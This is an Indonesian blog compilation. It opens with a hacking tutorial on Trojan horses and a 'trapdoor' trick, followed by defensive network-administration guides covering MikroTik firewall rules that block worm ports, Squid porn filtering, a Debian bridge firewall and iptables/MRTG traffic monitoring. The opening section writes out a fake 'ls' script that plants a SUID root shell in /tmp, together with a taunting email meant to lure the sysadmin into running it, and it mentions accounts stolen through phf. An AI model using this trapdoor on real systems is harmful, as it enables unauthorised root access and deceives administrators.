Tidak akan banyak penjelasan mengenai metode ini, sebab pada umumnya Trojan Horse hanya efektif jika kamu betul-betul pintar menutupi suatu program atau jika sang sysadmin memang betul-betul tolol. Pada prinsipnya, Trojan Horse adalah program yang mempunyai 'feature' gelap. Misalnya kamu membuat sebuah game yang cukup heboh dan kamu dengan sengaja menyelipkan perintah untuk membuka akses di dalam kode game kamu, sedemikian rupa sehingga saat sang sysadmin menjalankan program tersebut, tanpa disadarinya file .rhosts nya telah ketambahan sesuatu. Kami kenal seorang hacker yang lihai menulis skrip IRC, dan skrip IRC-nya kebetulan mempunyai banyak peminat. Beberapa 'lamers' mendownload skrip tersebut tanpa menyadari bahwa sang skrip menyelipkan beberapa perintah untuk mengizinkan akses tak berpassword kepada sang penulis asli skrip.

TRAPDOOR
Banyak persamaan antara Trapdoor dengan Backdoor dan Trojan Horse, namun dalam artikel ini, 'Trapdoor' diasumsikan sebagai cara yang bisa kita gunakan untuk menjebak (trap) sang sysadmin untuk memberikan kita akses root kedalam sistem. Seringkali kita terbentur masalah sistem operasi yang paling gres, atau sebuah sistem dimana hampir semua eksploit untuk mendapatkan root tidak berjalan sama sekali (patched systems). Jangan putus asa! Masih banyak metode yang bisa kita terapkan untuk membuat sang sysadmin tertipu, berakibat dibukanya akses ke dalam system. Misalkan kamu sudah berhari-hari mengoprek sebuah target dengan menggunakan account dan password seorang user biasa hasil colongan lewat phf, dan sayangnya tidak ada exploit yang mempan. Nah, sudah saatnya kita terapkan metode Trapdoor. Berikut adalah metode Trapdoor yang walaupun sederhana, masih saja bisa mengelabui puluhan sysadmin diluar sana.

Pertama-tama, kamu perlu merubah perizinan homedir kamu (atau homedir milik user yang accountnya kamu 'pinjam'):

user1@korban> chmod 700 ~/.

Nah, karena sekarang homedir kamu bermode 700, sang syadmin perlu mengganti privilesenya ke root jika beliau ingin memeriksa isi direktori ybs. Nah, langkah berikutnya adalah membuat sebuah skrip yang bertugas untuk bertingkahlaku selayaknya perintah biasa, namun diluar pengetahuan sang admin, justru membuka satu (atau beberapa) kelemahan dalam sistem. Yang langsung terpikir olehmu, jelas, perintah ls. Disinilah letak kelemahan UNIX dibanding ... uh, MS-DOS. Dalam UNIX, seorang sysadmin yang baik selalu mengetik 'full pathname' dari program manapun yang dia jalankan (seperti /bin/ls atau /usr/sbin/vi index.html), dan untuk tujuan kemudahan, biasanya /bin atau /usr/sbin sudah dimasukkan dalam daftar search path. Jadi jika misalnya sang sysadmin melakukan:

root# pwd
/usr/home/staff/user1
root# ls

maka yang dijalankan adalah program /bin/ls. Apa akibatnya jika kebetulan dalam direktori /usr/home/staff/user1 kita letakkan sebuah skrip bernama 'ls'? Heheheh ... cukup menarik, khan. Nah, sekarang kita bisa buat sebuah skrip yang berisi:

#!/bin/sh cp /bin/sh /tmp/vi-save-902887
chown root /tmp/vi-save-902887
chmod 4755 /tmp/vi-save-902887
rm ./ls
ls
simpan skrip tersebut di homedir user1, beri nama "ls" dan
user1@korban> chmod +x ls
sekarang tinggal pintar-pintarnya kamu mengakali sang sysadmin untuk mengecek isi homedir user1. Jika kamu kebetulan punya login/passwd untuk user2 di mesin yang sama, maka kamu bisa saja 'mengundang' sang admin. Login sebagai user1, dan kirim email

user1@korban> mail root@localhost
Subject: "Heheheh ... Kena garap dari belakang!"
Hello sysadmin tolol! Mesin kamu sudah kebobolan!
ttd, God of All Hackers, Virus Researchers and Lame Mailbombers,
Phardera .

Saat menerima email ini, sang Syadmin pun akan segera memeriksa isi homedir user1 (dengan perintah ls, tentunya), dan tanpa disadari sang sysadmin telah menciptakan sebuah shell root di /tmp/vi-save-902887. Dan, karena vi-save-902887 ber-SUID root, kamu bisa melakukan bermacam-macam hal menyenangkan dengannya. Tinggal login sebagai user2 beberapa waktu kemudian, dan nikmati ketenangan pikiran lewat shell root! Heheheh ...

firewall untuk router mikrotik....!!

2008-10-20T20:56:00.000-07:00

Untuk mengamankan router mikrotik dari traffic virus dan excess ping dapat digunakan skrip firewall berikut

Pertama buat address-list "ournetwork" yang berisi alamat IP radio, IP LAN dan IP WAN atau IP lainnya yang dapat dipercaya

Dalam contoh berikut alamat IP radio adalah = 10.0.0.0/16, IP LAN = 192.168.2.0/24 dan IP WAN = 203.89.24.0/21 dan IP lainnya yang dapat dipercaya = 202.67.33.7

Untuk membuat address-list dapat menggunakan contoh skrip seperti berikut ini tinggal disesuaikan dengan konfigurasi jaringan Anda.

Buat skrtip berikut menggunakan notepad kemudian copy-paste ke console mikrotik

/ ip firewall address-list
add list=ournetwork address=203.89.24.0/21 comment="Datautama Network"
disabled=no
add list=ournetwork address=10.0.0.0/16 comment="IP Radio" disabled=no
add list=ournetwork address=192.168.2.0/24 comment="LAN Network" disabled=no

Selanjutnya copy-paste skrip berikut pada console mikrotik

/ ip firewall filter
add chain=forward connection-state=established action=accept comment="allow
established connections" disabled=no
add chain=forward connection-state=related action=accept comment="allow
related connections" disabled=no
add chain=virus protocol=udp dst-port=135-139 action=drop comment="Drop
Messenger Worm" disabled=no
add chain=forward connection-state=invalid action=drop comment="drop invalid
connections" disabled=no
add chain=virus protocol=tcp dst-port=135-139 action=drop comment="Drop
Blaster Worm" disabled=no
add chain=virus protocol=tcp dst-port=1433-1434 action=drop comment="Worm"
disabled=no
add chain=virus protocol=tcp dst-port=445 action=drop comment="Drop Blaster
Worm" disabled=no
add chain=virus protocol=udp dst-port=445 action=drop comment="Drop Blaster
Worm" disabled=no
add chain=virus protocol=tcp dst-port=593 action=drop comment="________"
disabled=no
add chain=virus protocol=tcp dst-port=1024-1030 action=drop comment="________"
disabled=no
add chain=virus protocol=tcp dst-port=1080 action=drop comment="Drop MyDoom"
disabled=no
add chain=virus protocol=tcp dst-port=1214 action=drop comment="________"
disabled=no
add chain=virus protocol=tcp dst-port=1363 action=drop comment="ndm requester"
disabled=no
add chain=virus protocol=tcp dst-port=1364 action=drop comment="ndm server"
disabled=no
add chain=virus protocol=tcp dst-port=1368 action=drop comment="screen cast"
disabled=no
add chain=virus protocol=tcp dst-port=1373 action=drop comment="hromgrafx"
disabled=no
add chain=virus protocol=tcp dst-port=1377 action=drop comment="cichlid"
disabled=no
add chain=virus protocol=tcp dst-port=2745 action=drop comment="Bagle Virus"
disabled=no
add chain=virus protocol=tcp dst-port=2283 action=drop comment="Drop Dumaru.Y"
disabled=no
add chain=virus protocol=tcp dst-port=2535 action=drop comment="Drop Beagle"
disabled=no
add chain=virus protocol=tcp dst-port=2745 action=drop comment="Drop
Beagle.C-K" disabled=no
add chain=virus protocol=tcp dst-port=3127 action=drop comment="Drop MyDoom"
disabled=no
add chain=virus protocol=tcp dst-port=3410 action=drop comment="Drop Backdoor
OptixPro" disabled=no
add chain=virus protocol=tcp dst-port=4444 action=drop comment="Worm"
disabled=no
add chain=virus protocol=udp dst-port=4444 action=drop comment="Worm"
disabled=no
add chain=virus protocol=tcp dst-port=5554 action=drop comment="Drop Sasser"
disabled=no
add chain=virus protocol=tcp dst-port=8866 action=drop comment="Drop Beagle.B"
disabled=no
add chain=virus protocol=tcp dst-port=9898 action=drop comment="Drop
Dabber.A-B" disabled=no
add chain=virus protocol=tcp dst-port=10000 action=drop comment="Drop
Dumaru.Y, sebaiknya di didisable karena juga sering digunakan utk vpn atau
webmin" disabled=yes
add chain=virus protocol=tcp dst-port=10080 action=drop comment="Drop
MyDoom.B" disabled=no
add chain=virus protocol=tcp dst-port=12345 action=drop comment="Drop NetBus"
disabled=no
add chain=virus protocol=tcp dst-port=17300 action=drop comment="Drop Kuang2"
disabled=no
add chain=virus protocol=tcp dst-port=27374 action=drop comment="Drop
SubSeven" disabled=no
add chain=virus protocol=tcp dst-port=65506 action=drop comment="Drop PhatBot,
Agobot, Gaobot" disabled=no
add chain=forward action=jump jump-target=virus comment="jump to the virus
chain" disabled=no
add chain=input connection-state=established action=accept comment="Accept
established connections" disabled=no
add chain=input connection-state=related action=accept comment="Accept related
connections" disabled=no
add chain=input connection-state=invalid action=drop comment="Drop invalid
connections" disabled=no
add chain=input protocol=udp action=accept comment="UDP" disabled=no
add chain=input protocol=icmp limit=50/5s,2 action=accept comment="Allow
limited pings" disabled=no
add chain=input protocol=icmp action=drop comment="Drop excess pings"
disabled=no
add chain=input protocol=tcp dst-port=21 src-address-list=ournetwork
action=accept comment="FTP" disabled=no
add chain=input protocol=tcp dst-port=22 src-address-list=ournetwork
action=accept comment="SSH for secure shell" disabled=no
add chain=input protocol=tcp dst-port=23 src-address-list=ournetwork
action=accept comment="Telnet" disabled=no
add chain=input protocol=tcp dst-port=80 src-address-list=ournetwork
action=accept comment="Web" disabled=no
add chain=input protocol=tcp dst-port=8291 src-address-list=ournetwork
action=accept comment="winbox" disabled=no
add chain=input protocol=tcp dst-port=1723 action=accept comment="pptp-server"
disabled=no
add chain=input src-address-list=ournetwork action=accept comment="From
Datautama network" disabled=no
add chain=input action=log log-prefix="DROP INPUT" comment="Log everything
else" disabled=no
add chain=input action=drop comment="Drop everything else" disabled=no

Efek dari skrip diatas adalah:

1. Router mikrotik hanya dapat diakses FTP, SSH, Web dan Winbox dari IP yang didefinisikan dalam address-list "ournetwork" sehingga tidak bisa diakses dari sembarang tempat.
2. Port-port yang sering dimanfaatkan virus di blok sehingga traffic virus tidak dapat dilewatkan, tetapi perlu diperhatikan jika ada user yang kesulitan mengakses service tertentu harus dicek pada chain="virus" apakah port yang dibutuhkan user tersebut terblok oleh firewall.
3. Packet ping dibatasi untuk menghindari excess ping.
Selain itu yang perlu diperhatikan adalah: sebaiknya buat user baru dan password dengan group full kemudian disable user admin, hal ini untuk meminimasi resiko mikrotik Anda di hack orang.

Selamat mencoba.

Block situs porno dengan squid...!!

2008-10-20T20:46:00.000-07:00

Artikel ini saya buat dikarenakan banyaknya situs pornooo....!!

Catatan :
- Squid telah terinstal dengan baik dan mendukung Transparent proxy, jika belum lihat artikel "Mengkonfigurasi squid (proxy web cache) sebagai transparan proxy " oleh hari-huhui ( h4ri@telkom.netThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it ).
- Ipchains atau Iptables telah terinstal dan mendukung transparent proxy.
- Alamat IP lokal yang digunakan 192.168.30.0/24
- Squid dikonfigurasi menggunakan port 8080

Prinsip Kerja :
-----------------
Pada prinsipnya ada beberapa cara untuk memblokir situs porno dengan mengatur file konfigurasi "squid.conf" :
1. Menyaring berdasarkan nama domain atau URL lengkap, misalnya memblokir situs "www.playboy.com" maka cukup ditambahkan dua baris berikut ini :

acl bad dstdomain www.playboy.com
http_access deny bad

Kelemahan cara ini, situs "playboy.com" masih bisa diakses dan juga akan banyak acl yg harus di definisikan. Solusinya dengan cara membuat file khusus yg berisi daftar situs-situs yang diblokir sehingga konfigurasinya menjadi sbb :

acl bad dstdomain "/etc/squid/sex"
http_access deny bad

dan isi file "/etc/squid/sex" misalnya sbb:

vicidi.com
bedclip.com
indonona.com
exoticazza.com
dewasex.com

2. Menyaring berdasarkan kata yang terkandung pada nama domain, misalnya saya ingin memblokir situs yang mengandung kata "nude" maka konfigurasinya sbb :

acl bad url_regex -i nude
http_access deny bad

atau dengan membuat file khusus berisi daftar kata-kata yang dilarang maka sbb:

acl bad url_regex -i "/etc/squid/badwords"
http_access deny bad

dan isi file "/etc/squid/badwords" misalnya sbb:

theorgy
penthousemag
playboy
1stsex
lolita

3. Kedua cara diatas masih lemah karena situs "playboy.com" masih bisa diakses jika Anda tahu IP address situs tersebut. Tentunya hal ini terjadi jika client komputer Anda pada pinter-pinter, jika hal diatas masih belum mencukupi maka hal yang cukup berat harus kita lakukan yaitu dengan cara membuat file daftar IP address situs-situs yang diblokir. Hal ini bisa dilakukan dengan menggunakan utility nslookup, misal #nslookup playboy.com.

Contoh Konfigurasi :
------------------------
OK deh, cukup masalah teorinya. Berikut ini adalah konfigurasi squid yang saya buat dengan menggunakan cara ke-2 untuk memblokir beberapa situs porno :

1.) Konfigurasi "/etc/squid/squid.conf"

http_port 8080
icp_port 0
cache_mem 80 MB
maximum_object_size 256 KB
cache_dir ufs /cache 200 16 256
memory_pools_limit 32 MB
redirect_rewrites_host_header off
replacement_policy GDSF
half_closed_clients off
#-----------transparent proxy -----------
httpd_accel_host virtual
httpd_accel_port 80
httpd_accel_with_proxy on
httpd_accel_uses_host_header on
#-------------------------------------------
acl QUERY urlpath_regex cgi-bin ?
no_cache deny QUERY
acl all src 0.0.0.0/0.0.0.0
acl localhost src 127.0.0.1/255.255.255.255
acl lan src 192.168.30.0/255.255.255.0
acl Safe_ports port 80 443 210 119 563 70 21 1025-65535
acl CONNECT method CONNECT
acl notsex url_regex -i "/etc/squid/notsex"
acl sex url_regex -i "/etc/squid/sex"
no_cache deny SEX
http_access allow notsex all
http_access deny sex all
http_access allow lan
http_access allow localhost
http_access deny !Safe_ports
http_access deny CONNECT
http_access deny all
#---------------- administration info ------------
cache_mgr alfinux@telkom.netThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it
cache_effective_user squid
cache_effective_group squid
log_icp_queries off
cachemgr_passwd mypassword all
forwarded_for off
buffered_logs on
visible_hostname alfinuke.edcentral.pdk
ftp_user squid@edcentral.pdkThis e-mail address is being protected from spam bots, you need JavaScript enabled to view it

2.) Buat daftar situs yang diblokir (vi /etc/squid/sex) dengan editor favorit Anda.
Dan berikut ini file daftar situs yg di blokir baik berdasarkan kata maupun nama situs (/etc/squid/sex):

.*.(praline|eroticworld|orion).de
.*.(theorgy|penthousemag|playboy|1stsex|lolita|sexpix|sexshop).*
.*.(smutland|hustler.onprod|hustler2.onprod|cybervixen|asiansex).*
ftp.netcom.com/pub/ac/acott
www.tvtoday.de:9600
.*.(carolcox|eroticbodies).*
.*.(cyberlustxxx|cyberporn|intersex).inter.net*
.*.(eroticxxx|sexy4you|dani|danni|hotsex|kinky|lesbos|porno|xpics).*
.*.(over21|regsex|sexnet|sextoy|smeggy|sordid).*
.*.(cybersex|hcabaret|livesex|sex4you|sexmall).*
.*.(lovesexy|nastysex|pantless|playware|showgirl).*
.*.(2xxxcite|dreamsex|futuresex|sover21sex|explaza).*
.*.(xxxparadise|playbabe|celebnude|greyhawks|sexfinder|xxx-video).*
.*.(sexaphone|beate-uhse|fantasysex|sexparlor|sexnetwork).*
.*.(cybervixen|internetsex|silverotica|erotica2000|ultimatexxx).*
.*.(xxx-rawsex-xxx|amateurs|amateursweb|erotica-toys|orion-erotic).*
.*.(sexy-jewelry|hollywoodxxx|cybererotica|sexfantasy).*
.*.(danisherotica|sexy-playmates|nastyhabits|sugarandspice|kathryn).*
.*.(persiankitty|adultplayground|supernudes|playsex).*
.*.(pinupmall|porn.byus|smutland|sizzle|heavyhangers).*
.*.(hardcorjunky|fetish|adultplayhouse|pornpics|asiansex).*
.*.(hustler|freepics|wetgirls|tropixxx|sex|pixxxcity).*
.*.(4adultsonly|peepshow|voulezvous|rated-x|69pornplace).*
.*.(shavedsluts|nudepalace|xxxguide|pics-xxx|naughty|thehotzone).*
.*.(nervemag|carolcox|snatches|freeporn|playgirlmag|cyberspice).*
.*.(erotica|afro-erotica).*
(teen|girls|xxxpic).*
(www.sex|*****.bahnhof).*
.*.(gay|sex).*
.*.fun.nl
www.playmen.it/
www.gisa.it/sex/
www.iol.it/sexol/
globall.com/j/xxx/
www.hh.nl/n-m/pic/
www.pi.net/~pauze/
www.oden.se/~hedback/
aau.diasoft.ru/~hotsex/
www.donsworld.com/xadultx/
www.well.com/user/sexymate/
ftp.zippo.com/pictures/erotica/
mm.iit.uni-miskolc.hu/Data/ladies/
drn.zippo.com/zippo-bin/wwwdecode/
pilot.msu.edu/user/rozwadow/pamela
#------manual--------
pageseeker.com
arsipceritaseru
freeones
vicidi
bedclip
indonona.com
exoticazza.com
dewasex.com
extrajos.com
bopekindo.com
sanggrahan.org
sanggrahan.com
grahan.com
vicidi.com
17tahun.com
ceritaseru.org
ceritapanas.com
celebdirectory.com
hiburan.web1000.com
seeasians.com
nyamuk.adultnations.com

3.) Daftar situs exceptions (pengecualian ;-) ) (vi /etc/squid/notsex)
Dan satu lagi daftar situs yang bukan termasuk situs porno, sebagai pencegahan agar tidak diblokir :

.*.msexchange.*
.*.msexcel.*
.*freetown.*
.*geek-girls.*
.*scsext.*
missingheart
documen
button
wirelessexcite
msexchange
msexcel
aids.lv
freetown
geek-girls
scsext
steen
adulteducation
sekst
newshits
glass
georgia
peet
chicag
speech
speed
speedtest
liputan6.com
expedia.com

Maintenance/Updating
--------------------------
Walaupun dengan beberapa kelemahan yang ada, tapi cara-cara yang digunakan masih cukup efektif untuk mencegah para pengguna Internet pemula mengakses situs-situs yang tidak baik. Dan tentunya tugas Anda sebagai Administrator dari proxy server tersebut adalah menjaga agar Anda tidak kalah dengan client yang lain dalam hal perbendaharaan situs "nude" yang diaksesnya. Tentu saja dengan selalu mengupdate file-file daftar tersebut (/etc/squid/sex dan /etc/squid/notsex). Jika ternyata ada situs yang client Anda ingin akses dan ternyata diblokir, maka nama situs tersebut bisa Anda masukkan pada daftar di "/etc/squid/notsex".

Halaman Peringatan/Redirector
-------------------------------------
Dan untuk sedikit peringatan kepada client bahwa kita mengawasi aktivitas mereka, bisa dilakukan dengan memodifikasi file "/etc/squid/errors/ERR_ACCESS_DENIED" dan masukkan sedikit javascript untuk meredirect ke situs lain, contoh yang saya lakukan sbb yang akan mengarahkan client ke situs intranet atau situs lain (biar insyaf, eling atuh !!! :)) :

#--------------- /etc/squid/errors/ERR_ACCESS_DENIED -----------------------

ERROR: The requested URL could not be retrieved

<--
var howMany = 10; // jumlah situs pengganti
var page = new Array(howMany+1);

page[0]="http://192.168.10.65";
page[1]="http://www.eramuslim.com";
page[2]="http://www.klikdt.com";
page[3]="http://www.dikmenjur.net";
page[4]="http://www.dikmenjur.com";
page[5]="http://www.jis.or.id";
page[6]="http://www.harunyahya.com";
page[7]="http://www.hidayatullah.com";
page[8]="http://www.myquran.com";
page[9]="http://www.sekolah2000.or.id";
page[10]="http://www.percikaniman.com";

function rndnumber(){
var randscript = -1;
while (randscript < 0 || randscript > howMany || isNaN(randscript)){
randscript = parseInt(Math.random()*(howMany+1));
}
return randscript;
}
quo = rndnumber();
quox = page[quo];
window.location=(quox);

ERROR

The requested URL could not be retrieved

While trying to retrieve the URL:
%U

The following error was encountered:
Access Denied.

Access control configuration prevents your request from
being allowed at this time. Please contact your service provider if
you feel this is incorrect.

Your cache administrator is %w.

#--------------- /etc/squid/errors/ERR_ACCESS_DENIED -----------------------

Pengembangan lebih lanjut dari blokir akses ini bisa menggunakan aplikasi pihak ketiga di bawah ini dan kalau ada waktu mungkin akan saya buat artikel penggunaannya ;-) :
- http://blacklist.dansguardian.org/ (DanGuardian)
- http://www.squidguard.org/ (SquidGuard)

trans....firewall

2008-10-20T20:44:00.000-07:00

Transparent Firewall adalah firewall yang "tidak tampak" baik oleh user di dalam zona yang kita amankan atau dari luar zona kita. Transparent Firewall pada dasarnya adalah firewall biasa hanya saja implementasinya dilakukan pada bridge, sehingga tidak ada konfigurasi yang harus dilakukan pada jaringan yang sudah ada.

Tutorial ini akan (mencoba) untuk menjelaskan secara singkat bagaimana dan apa saja yang diperlukan dalam pembuatan bridge firewall pada Debian GNU/Linux, dan pengaturan umum kerja firewall yang kita buat.

Topologi yang dipakai diasumsikan seperti gambar di bawah ini.

+----------+ +--------+ +---------------+
| INTERNET |-----| BRIDGE |-----| JARINGAN KITA |
+----------+ +--------+ +---------------+
1. Kebutuhan Dasar

Implementasi ini membutuhkan beberapa hal yaitu:

1. Komputer dengan 2 NIC
2. iptables
3. bridge-utils
4. Kernel Linux 2.6 atau 2.4(dengan patch) dengan opsi bridge firewall diaktifkan

Bila anda ingin menggunakan kernel versi 2.4 silakan cari patchnya di http://ebtables.sourceforge.net/. Kernel 2.6 sudah menyertakan fasilitas ini, sehingga tidak perlu dipatch lagi.

Di sini diasumsikan bahwa kernel sudah beres, dan tinggal menginstall program lain yang dibutuhkan untuk menjalankan bridge. Komputer yang dipakai mempunyai 2 NIC yaitu eth0 dan eth1.
2. Instalasi & Konfigurasi

Seperti biasa, untuk menginstall paket pada debian kita menggunakan apt-get.

root:~# apt-get install bridge-utils iptables

Bila anda tidak menggunakan distro lain anda dapat mendownload source code untuk kedua program itu pada http://bridge.sourceforge.net/ dan http://www.iptables.org/files/ . Panduan proses instalasi dapat mengikuti file README/INSTALL yang disertakan pada tarball yang anda download.

Program yang kita dapatkan dari bridge-utils adalah brctl. Program inilah yang mengatur segala macam bagian bridge mulai pembuatan, penghapusan, penambahan anggota bridge, dan sebagainya. Buat interface bridge (br0), dan tambahkan kedua interface ke dalam interface bridge yang baru dibuat.

root:~# brctl addbr br0
root:~# brctl addif br0 eth0
root:~# brctl addif br0 eth1
root:~# ifconfig eth0 0
root:~# ifconfig eth1 0

Hapus alamat IP pada eth0 dan eth1, dan bila bridge ini akan diberi alamat IP maka yang perlu diberi alamat adalah br0. Interface lain harus tetap menyala tanpa mempunyai alamat IP sendiri. Nantinya, kedua ethernet yang ada akan merespon setiap request yang masuk ke alamat IP bridge.

Cobalah untuk memping jaringan di luar jaringan anda. Bila lancar, berarti bridge ini sudah berjalan dengan baik. Agar setiap booting kita tidak mengulangi langkah-langkah di atas maka edit file /etc/network/interfaces dan tambahkan konfigurasi seperlunya. Contoh file saya ada di bawah ini.

auto br0
iface br0 inet static
address 10.11.12.3
netmask 255.255.255.0
network 10.11.12.0
broadcast 10.11.12.255
gateway 10.11.12.1
bridge_ports eth0 eth1

Catatan: perhatikan item konfigurasi yang dicetak tebal.

Pastikan juga anda mengaktifkan IP Forwarding dengan mengeksekusi perintah di bawah ini tiap kali komputer booting.

root:~# echo 1 > /proc/sys/net/ipv4/ip_forward

Selain cara manual itu anda dapat pula mengedit file /etc/network/options.

ip_forward=yes
spoofprotect=yes
syncookies=no

Sekarang anda dapat mengkonfigurasi iptables untuk melakukan penyaringan terhadap paket-paket data yang melewati firewall ini. Iptables tidak akan dibahas mendalam di sini. Sekedar info, penyaringan ini dilakukan pada tabel Filter chain FORWARD. Contoh:

root:~# iptables -t Filter -A FORWARD -s 0.0.0.0 -d 10.11.12.0/24 -p tcp --dport 23 -j DROP
root:~# iptables -t Filter -A FORWARD -s 0.0.0.0 -d 10.11.12.0/24 -p tcp --dport 25 -j DROP
root:~# iptables -t Filter -A FORWARD -s 0.0.0.0 -d 10.11.12.0/24 -p udp --dport 161 -j DROP

Potongan instruksi iptables di atas memfilter paket-paket dari luar network kita yang akan mengakses port telnet, smtp, dan snmp. Tambahkan filter lain sesuai dengan yang anda butuhkan.

Simpanlah perintah-perintah yang anda jalankan pada sebuah script .sh dan ubahlah permission file tersebut agar bisa dieksekusi(executable). Aturlah agar file itu diekseuksi setiap kali boot. Ada beberapa cara melakukannya, yang termudah adalah menambahkan entri pada /etc/network/interfaces. Bila script iptables itu disimpan di /etc/init.d/aturanfirewall.sh anda dapat menambahkan baris berikut di bawah entri br0.

up command /etc/init.d/aturanfirewall.sh

Dengan demikian isi file /etc/network/interfaces menjadi seperti di bawah ini.

auto br0
iface br0 inet static
address 10.11.12.3
netmask 255.255.255.0
network 10.11.12.0
broadcast 10.11.12.255
gateway 10.11.12.1
bridge_ports eth0 eth1
up command /etc/init.d/aturanfirewall.sh

Dengan menggunakan bash script kecil untuk memparsing output command "iptables -nvL FORWARD" anda dapat memantau aktifitas filtering seperti ini :)

+---------------------------------------------------------+
| I/O Total | 95M Packets 62G Bytes |
+-------------+---------------------+---------------------+
| | Traffic In | Traffic Out |
| Filter +----------+----------+----------+----------+
| | Byte | Packet | Byte | Packet |
+-------------+----------+----------+----------+----------+
| Ping Blaster| 0 | 0 | 23184 | 252 |
| udp 69 | 0 | 0 | 0 | 0 |
| udp 135 | 0 | 0 | 0 | 0 |
| udp 137 | 38298 | 491 | 9828 | 126 |
| udp 138 | 534 | 2 | 1343 | 5 |
| udp 445 | 0 | 0 | 0 | 0 |
| udp 161 | 3672 | 54 | 0 | 0 |
| tcp 23 | 912 | 19 | 0 | 0 |
| tcp 135 | 47520 | 990 | 1584 | 33 |
| tcp 445 | 1027K | 21402 | 15180 | 316 |
| tcp 593 | 0 | 0 | 0 | 0 |
| tcp 4444 | 528 | 12 | 864 | 18 |
+-------------+----------+----------+----------+----------+
selamat mencoba......!!

Monitoring Trafik Network Menggunakan iptables dan MRTG .....!!

2008-10-20T20:42:00.000-07:00

Dengan berbagai metode kita dapat mengukur besar keluar-masuknya data tiap komputer dalam jaringan kita. Salah satu cara yang sederhana dan mudah dikerjakan adalah dengan menggunakan iptables dan MRTG. Iptables hanya digunakan untuk menghitung besar data yang masuk untuk tiap-tiap komputer dalam jaringan, dan hasilnya ditampilkan dengan menggunakan MRTG. Dengan begitu kita tidak perlu menginstall server snmp di tiap komputer, namun masih bisa mendapatkan gambaran umum aktifitas koneksi tiap komputer dengan jaringan lain.

Di sini diasumsikan bahwa jaringan kita beralamat 10.11.12.0/24, pengukuran dilakukan di gateway dengan alamat 10.11.12.1.
1. Instalasi

Program yang kita butuhkan di sini tidak begitu banyak, dan biasanya pada beberapa distro linux program-program ini sudah disertakan di CD. Bila tidak ada, beberapa program inilah yang harus anda download dan anda install.

1. MRTG, dapat didownload dari http://www.ee.ethz.ch/~oetiker/webtools/mrtg/
2. iptables(versi > 1.2.6), dapat didownload dari http://www.netfilter.org
3. Apache web server, dapat didownload dari http://httpd.apache.org (web server lain juga bisa)

Ikuti petunjuk instalasi yang disertakan pada tiap-tiap program, biasanya ada pada file README dan INSTALL.
2. Iptables

Untuk bisa mengetahui jumlah keluar/masuknya paket data untuk suatu komputer kita harus menghitungnya secara terpisah yaitu untuk yang masuk dan untuk yang keluar. Bila kita akan mengamati sepuluh komputer, maka setidaknya harus ada 20 rule iptables. Chain yang digunakan untuk mengamati adalah chain FORWARD.

Untuk memudahkan pengamatan & parsing nilai hitungan iptables kita dapat menambahkan masing-masing 2 chain kosong yang menjadi target rule sehingga memudahkan kita dalam menjalankan grep, misal dengan menggunakan nama komputer yang kita beri tambahan -in dan -out.
root:~# iptables -N yudhistira-in
root:~# iptables -N yudhistira-out
root:~# iptables -A FORWARD -d 10.11.12.2 -j yudhistira-in
root:~# iptables -A FORWARD -s 10.11.12.2 -j yudhistira-out

root:~# iptables -N anoman-in
root:~# iptables -N anoman-out
root:~# iptables -A FORWARD -d 10.11.12.3 -j anoman-in
root:~# iptables -A FORWARD -s 10.11.12.3 -j anoman-out

root:~# iptables -N bagong-in
root:~# iptables -N bagong-out
root:~# iptables -A FORWARD -d 10.11.12.4 -j bagong-in
root:~# iptables -A FORWARD -s 10.11.12.4 -j bagong-out

root:~# iptables -nvxL FORWARD
Chain FORWARD (policy ACCEPT 0 packets, 0 bytes)
pkts bytes target prot opt in out source destination
0 0 yudhistira-in all -- * * 0.0.0.0/0 10.11.12.2
0 0 yudhistira-out all -- * * 10.11.12.2 0.0.0.0/0
0 0 anoman-in all -- * * 0.0.0.0/0 10.11.12.3
0 0 anoman-out all -- * * 10.11.12.3 0.0.0.0/0
0 0 bagong-in all -- * * 0.0.0.0/0 10.11.12.3
0 0 bagong-out all -- * * 10.11.12.3 0.0.0.0/0

Di atas dapat kita lihat bahwa kalau kita ingin mengambil besar data(dalam bytes) output iptables -nvxL FORWARD dapat kita pipe kan ke grep dan mengambil nilai kolom kedua dari output yang dihasilkan oleh grep.

root:~# iptables -nvxL FORWARD | grep bagong-in
0 0 bagong-in all -- * * 0.0.0.0/0 10.11.12.3
root:~# iptables -nvxL FORWARD | grep bagong-in | awk '{print $2}'
0

Untuk memudahkan kita dalam memasukkan nilainya ke MRTG kita bisa membuat script kecil seperti ini:

#!/bin/sh
paketIN=`/sbin/iptables -nvxL FORWARD | grep "$1-in" | awk '{print $2}'`
paketOUT=`/sbin/iptables -nvxL FORWARD | grep "$1-out" | awk '{print $2}'`
echo $paketIN
echo $paketOUT

Pemakaiannya hanyalah dengan cara menuliskan nama scriptnya dengan 1 parameter yaitu [nama komputer], misalnya scriptbacatrafik.sh bagong. Script ini akan mencetak nilai bytes yang keluar dari jaringan kita yang berasal dari komputer "bagong". Angka ini diambil dari iptables, sehingga kata bagong atau apa pun itu harus anda sesuaikan dengan nama chain yang anda gunakan di iptables.
3. MRTG

Nilai yang dimasukkan ke mrtg haruslah berpasangan, pertama untuk in dan kedua untuk out. Nilai ini dapat diambil dari SNMP, dapat pula diambil dari nilai eksekusi program tertentu. Contoh mrtg.cfg yang mengambil nilai dari script yang tadi kita buat dapat dilihat di bawah ini.

WorkDir: /var/www/mrtg

Target[anoman]: `/usr/local/sbin/scriptbacatrafik.sh anoman`
Title[anoman]: Anoman
PageTop[anoman]:

Anoman

MaxBytes[anoman]: 1250000
YLegend[anoman]: Bytes/s
ShortLegend[anoman]: B/s
LegendI[anoman]: Traffic in
LegendO[anoman]: Traffic out
Legend1[anoman]: Traffic in Bytes per Second

Target[bagong]: `/usr/local/sbin/scriptbacatrafik.sh bagong`
Title[bagong]: bagong
PageTop[bagong]:

bagong

MaxBytes[bagong]: 1250000
YLegend[bagong]: Bytes/s
ShortLegend[bagong]: B/s
LegendI[bagong]: Traffic in
LegendO[bagong]: Traffic out
Legend1[bagong]: Traffic in Bytes per Second

Target[yudhistira]: `/usr/local/sbin/scriptbacatrafik.sh yudhistira`
Title[yudhistira]: yudhistira
PageTop[yudhistira]:

yudhistira

MaxBytes[yudhistira]: 1250000
YLegend[yudhistira]: Bytes/s
ShortLegend[yudhistira]: B/s
LegendI[yudhistira]: Traffic in
LegendO[yudhistira]: Traffic out
Legend1[yudhistira]: Traffic in Bytes per Second

Setelah file konfigurasi selesai, jalankan indexmaker untuk membuat file index.html MRTG.

root:~# indexmaker /path/file/mrtg.cfg > /var/www/mrtg/index.html

